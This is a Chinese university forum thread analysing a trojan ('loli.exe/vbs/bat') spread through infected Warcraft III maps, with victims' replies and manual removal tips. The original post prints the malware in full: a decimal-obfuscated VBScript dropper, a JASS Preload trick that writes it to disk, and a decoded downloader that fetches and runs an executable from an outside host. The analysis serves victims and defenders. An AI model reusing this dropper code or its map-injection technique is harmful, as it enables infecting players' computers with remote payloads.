厦门大学论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

关于近期很多人感染的木马病毒 loli.exe loli.vbs loli.bat

  [复制链接]
纯情小黑龙 发表于 2016-11-5 22:26:04 | 显示全部楼层 |阅读模式
关于近期很多人感染的木马病毒 loli.exe loli.vbs loli.bat

基本上是  腾讯对战平台 玩魔兽war3 的用户
表现  开机提示自启动项 loli.exe    自启动loli.bat
在C盘出现  loli.exe  loli.vbs loli.bat     QQ电脑管家 360杀毒都只能发现异常启动项删除。无用,会再次生成。 提交到管家,呵呵,所谓的NO1的软件。 论坛管理直接给转移扔灌水区呢。无人处理。

然后我们来看一下这三个文件
链接: http://pan.baidu.com/s/1sl6ct7R 密码: 6xbu
loli.exe
loli.vbs
  1. data="83,101,116,32,80,111,115,116,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,115,120,109,108,50,46,83,101,114,118,101,114,88,77,76,72,84,84,80,46,51,46,48,34,41,13,10,83,101,116,32,83,104,101,108,108,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,115,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,80,111,115,116,46,79,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,119,119,119,46,108,111,120,118,101,46,99,111,109,47,108,111,108,105,46,98,97,116,34,44,48,13,10,80,111,115,116,46,83,101,110,100,40,41,13,10,83,101,116,32,97,71,101,116,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,65,68,79,68,66,46,83,116,114,101,97,109,34,41,13,10,97,71,101,116,46,77,111,100,101,32,61,32,51,13,10,97,71,101,116,46,84,121,112,101,32,61,32,49,13,10,97,71,101,116,46,79,112,101,110,40,41,32,13,10,97,71,101,116,46,87,114,105,116,101,40,80,111,115,116,46,114,101,115,112,111,110,115,101,66,111,100,121,41,13,10,97,71,101,116,46,83,97,118,101,84,111,70,105,108,101,32,34,99,58,92,108,111,108,105,46,98,97,116,34,44,50,13,10,119,115,99,114,105,112,116,46,115,108,101,101,112,32,49,48,48,48,32,13,10,83,104,101,108,108,46,82,117,110,32,40,34,99,58,92,108,111,108,105,46,98,97,116,34,41"
  2. Function ChrData(Data)
复制代码


loli.bat
  1. function PreloadFiles takes nothing returns nothing

  2.         call Preload( "
  3. echo off
  4. del "c:/loli.vbs"
  5. cls
  6. set /p=data=^"83,101,116,32,80,111,115,116,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,115,120,109,108,50,46,83,101,114,118,101,114,88,77,76,72,84,84,80,46,51,46,48,34,41,13,10,<nul>>c:/loli.vbs
  7. 2>nul " )
  8.         call Preload( " "2>nul
  9. set /p=83,101,116,32,83,104,101,108,108,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,115,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,80,111,115,116,46,79,112,101,110,32,34,71,69,84,34,44,34,104,116,<nul>>c:/loli.vbs
  10. 2>nul " )
  11.         call Preload( " "2>nul
  12. set /p= 116,112,58,47,47,119,119,119,46,108,111,120,118,101,46,99,111,109,47,108,111,108,105,46,98,97,116,34,44,48,13,10,80,111,115,116,46,83,101,110,100,40,41,13,10,83,101,116,32,97,71,101,116,32,61,32,67,114,101,97,116,101<nul>>c:/loli.vbs
  13. 2>nul " )
  14.         call Preload( " "2>nul
  15. set /p= ,79,98,106,101,99,116,40,34,65,68,79,68,66,46,83,116,114,101,97,109,34,41,13,10,97,71,101,116,46,77,111,100,101,32,61,32,51,13,10,97,71,101,116,46,84,121,112,101,32,61,32,49,13,10,97,71,101,116,46,79,112,101,110,40,<nul>>c:/loli.vbs
  16. 2>nul " )
  17.         call Preload( " "2>nul
  18. set /p=41,32,13,10,97,71,101,116,46,87,114,105,116,101,40,80,111,115,116,46,114,101,115,112,111,110,115,101,66,111,100,121,41,13,10,97,71,101,116,46,83,97,118,101,84,111,70,105,108,101,32,34,99,58,92,108,111,108,105,46,98,<nul>>c:/loli.vbs
  19. 2>nul " )
  20.         call Preload( " "2>nul
  21. >>c:/loli.vbs echo 97,116,34,44,50,13,10,119,115,99,114,105,112,116,46,115,108,101,101,112,32,49,48,48,48,32,13,10,83,104,101,108,108,46,82,117,110,32,40,34,99,58,92,108,111,108,105,46,98,97,116,34,41"
  22. echo Function ChrData(Data)>>c:/loli.vbs
  23. 2>nul" )
  24.         call Preload( " "2>nul
  25. >>c:/loli.vbs echo MyArray = Split(Data, ",", -1, 1)
  26. >>c:/loli.vbs echo For each OldData in MyArray
  27. >>c:/loli.vbs echo Newdata=NewData^&chr(OldData)
  28. >>c:/loli.vbs echo Next
  29. >>c:/loli.vbs echo ChrData=NewData
  30. 2>nul " )
  31.         call Preload( " "2>nul
  32. >>c:/loli.vbs echo End Function
  33. >>c:/loli.vbs echo wscript.sleep 30000
  34. >>c:/loli.vbs echo execute Chrdata(data)
  35. start c:/loli.vbs
  36. exit
  37. " )
  38.         call PreloadEnd( 0.0 )

  39. endfunction

复制代码


install.exe  
会自动删除。

  1. Set Post = CreateObject("Msxml2.ServerXMLHTTP.3.0")
  2. Set Shell = CreateObject("Wscript.Shell")
  3. Post.Open "GET","http://og3nhp3ql.bkt.clouddn.com/install.exe",0
  4. Post.Send()
  5. Set aGet = CreateObject("ADODB.Stream")
  6. aGet.Mode = 3
  7. aGet.Type = 1
  8. aGet.Open()
  9. aGet.Write(Post.responseBody)
  10. aGet.SaveToFile "c:\loli.exe",2
  11. wscript.sleep 1000
  12. Shell.Run ("c:\loli.exe")
复制代码

来源自  www.loxve.com/app/War3_UnHack/client.txt
  1. 933007781419441EED18A8122D84F5F5#http://og3nhp3ql.bkt.clouddn.com/War3_UnHack.asi
复制代码
很明显跟 war3 寒冰王座 暴雪的游戏有关。  大部分的用户会在进入腾讯对战平台游戏地图时,会自动N条发布广告类似如下:  
  1. 生活化狂潮....(WAR3的地图名字)..包含作弊脚本:火龙HKE
复制代码

看出作者 跟火龙这个外挂脚本有关。 跟 loxve.com的站长有关。=========================
instll.exe 、自动运行,其它行为
在注册表  可以运行CMD  regedit 查找
  1. HKEY_CURRENT_USER\\Software\Microsoft\GDIPlus
  2. [FontCachePath] = [%USERPROFILE%\Local Settings\Application Data]
  3. HKEY_LOCAL_MACHINE\\SYSTEM\ControlSet001\Control\Session Manager
  4. [PendingFileRenameOperations] = [\??\%temp%\_@17.tmp]
  5. HKEY_LOCAL_MACHINE\\SYSTEM\CurrentControlSet\Control\Session Manager
  6. [PendingFileRenameOperations] = [\??\%temp%\_@17.tmp]
复制代码

再来,我操 我是下载在D盘 DOWN目录下 居然都有了
  1. \??\C:\loli.exe

  2. \??\C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\loli.bat

  3. \??\D:\Down\loli virus test\download\install.exe

复制代码

C:\Users\Administrator
C:\Users\Administrator\AppData\Local\Temp\
C:\Users\Administrator\AppData\Local\Temp\   

手动删除
A,找到魔兽war3的安装目录    Warcraft\redist\miles\War3_UnHack.asi 这个文件删除掉.   C盘下的loli.exe  vbs bat 之类的
B,删除所有感染地图。地图已经全部被修改加载了病毒。必须删除。如果有魔兽安装包的 可以直接粉碎整个WAR3 再安装。
     地图目录在您的魔兽安装文件下Warcraft\maps\  里面
目前作者可能自己感觉到感染面积过大,估计怕引发法律纠纷。声明该病毒没有任何危害性,只是作为检测进入房间的地图是否含有作弊脚本。
主动提供了清除工具。 但是强制性的进入他人电脑,并利用其作为二次传染源。已经走向了危险了一步。这个漏洞既然早已被人发现 为什么其它人不去利用。
http://og3nhp3ql.bkt.clouddn.com/loli.exe





最后说一句 病毒作者可能是个萝莉控。怎么跑去玩易语言。强制感染,自动群发广告,说是为抵制作弊。却不停群发火龙的广告,帮火龙做广告,让更多的人去用脚本。 然后被感染的继续群发火龙广告,然后更多的人去搜索下载作弊脚本。恶性循环。不是火龙亲戚么。


铁血军魂 发表于 2016-12-22 11:55:08 | 显示全部楼层
求帮忙,能帮我远程操作删下?

铁血军魂 发表于 2016-12-22 11:56:43 | 显示全部楼层
玩一次就有这个病毒,杀毒一次就没有,我的到不会发脚本之类的,会造成网络堵塞,还盗取了战网账号

铁血军魂 发表于 2016-12-22 11:58:11 | 显示全部楼层
卸载再安装之类的方法都试过了,目录文件全清了,对战平台也卸载了,再安装,还是会有这个木马

热心网友  发表于 2017-6-13 18:56:02
这个病毒式传销模式。因为WAR3游戏地图是 互相下载的。会感染的人建立房间后。其它人下载地图会继续传染。非常严重。
作者做着玩结果事情大条了。而且已经影响到PC的正常使用


基本第一大家把安装文件给粉碎了重新安装一次
然后找到安装目录:Warcraft\redist\miles\


这个文件夹下,新建立一个文件 War3_UnHack.asi  ( 注意后缀是 .asi   有些不懂的文件后缀名隐藏了的。先显示出来再修改。)

内容为空。 然后右键设置属性为只读。


另外就是注意: 别进那些 什么 强奸萝莉   什么美女地图 之类的图。估计是源头的恶意地图。

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关于我们|校园风景|厦大贴吧|人才招聘|校园租房|考研信息|二手物品|禁闭帐号|手机论坛||广告联系

Copyright 1921-2021 厦门大学论坛-鼓浪听涛:厦大学子最喜爱的校园社区,厦门大学考研论坛!

GMT+8, 2025-9-21 06:00 , Processed in 0.016880 second(s), 9 queries , Gzip On, MemCached On.

快速回复 返回顶部 返回列表